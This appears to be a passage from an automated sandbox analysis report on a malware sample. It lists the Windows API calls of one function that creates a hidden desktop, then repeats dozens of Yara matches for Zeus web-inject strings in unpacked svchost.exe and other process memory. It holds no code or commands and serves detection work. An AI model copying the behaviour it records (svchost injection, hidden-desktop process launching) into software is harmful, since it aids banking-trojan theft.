Code function: 2_2_02C786C0 CreateDesktopA,SetThreadDesktop,memset,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,RegisterWindowMessageA,CreateThread,GetHandleInformation,SetThreadDesktop,memset,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,CreateThread,GetHandleInformation,CloseHandle,SetEvent,

2_2_02C786C0

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.3.svchost.exe.2d30000.45.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.ed00000.12.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.62.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.NcYLgtXIKJgHj.exe.2f50000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.70.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.Bpfz752pYZ.exe.6f8dc8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.43.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.35.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.51.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.NcYLgtXIKJgHj.exe.2b92000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.26.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.10.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 22.2.NcYLgtXIKJgHj.exe.5e2000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.37.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.73.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.19.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.38.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.72.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.13.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.ed00000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.NcYLgtXIKJgHj.exe.2b92000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.Bpfz752pYZ.exe.6f81c8.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.34.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.54.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.40.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.ee00000.74.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.69.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.NcYLgtXIKJgHj.exe.2792000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.41.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.57.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 10.2.NcYLgtXIKJgHj.exe.1520000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.56.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.28.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 7.2.NcYLgtXIKJgHj.exe.2fa2000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.70.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 14.2.NcYLgtXIKJgHj.exe.2ac0000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 7.2.NcYLgtXIKJgHj.exe.3100000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.61.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.29.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.50.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.31.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.46.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.73.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.67.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.11.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.63.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.29f3c00.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.64.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.39.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.NcYLgtXIKJgHj.exe.1740000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 16.2.NcYLgtXIKJgHj.exe.2792000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.NcYLgtXIKJgHj.exe.2202000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.34.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.67.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 20.2.NcYLgtXIKJgHj.exe.2652000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.41.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.56.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.21.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.40.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.35.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886c00.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.5450000.15.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.47.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2cd1c00.4.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.36.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.71.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 10.2.NcYLgtXIKJgHj.exe.14c2000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 28.2.NcYLgtXIKJgHj.exe.2eb0000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.63.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.49.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.71.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.14.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.29f3c00.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.Bpfz752pYZ.exe.407000.0.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.48.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.881000.4.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.NcYLgtXIKJgHj.exe.16e2000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.16.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.66.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.59.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.58.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 28.2.NcYLgtXIKJgHj.exe.2d12000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.43.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.NcYLgtXIKJgHj.exe.16e2000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.8.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.37.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 20.2.NcYLgtXIKJgHj.exe.27d0000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.Bpfz752pYZ.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.32.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.33.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.30.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.33.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.65.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.29a2000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.65.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.NcYLgtXIKJgHj.exe.2792000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.57.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.55.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.NcYLgtXIKJgHj.exe.23a0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.44.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.30.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.Bpfz752pYZ.exe.406400.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.42.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.59.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2cd1c00.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2c70000.5.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 22.2.NcYLgtXIKJgHj.exe.2340000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.38.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.72.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.NcYLgtXIKJgHj.exe.23a0000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.53.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.881000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.23.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.39.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 34.2.NcYLgtXIKJgHj.exe.bd2000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.31.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 10.2.NcYLgtXIKJgHj.exe.14c2000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 14.2.NcYLgtXIKJgHj.exe.2922000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.18.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.NcYLgtXIKJgHj.exe.27f0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.62.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.25.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 34.2.NcYLgtXIKJgHj.exe.bd2000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.Bpfz752pYZ.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.5450000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 22.2.NcYLgtXIKJgHj.exe.5e2000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 28.2.NcYLgtXIKJgHj.exe.2d12000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 34.2.NcYLgtXIKJgHj.exe.2740000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.22.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.881000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.407000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.17.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.45.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 20.2.NcYLgtXIKJgHj.exe.27d0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.Bpfz752pYZ.exe.406400.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 10.2.NcYLgtXIKJgHj.exe.1520000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.Bpfz752pYZ.exe.407000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.27.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.52.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
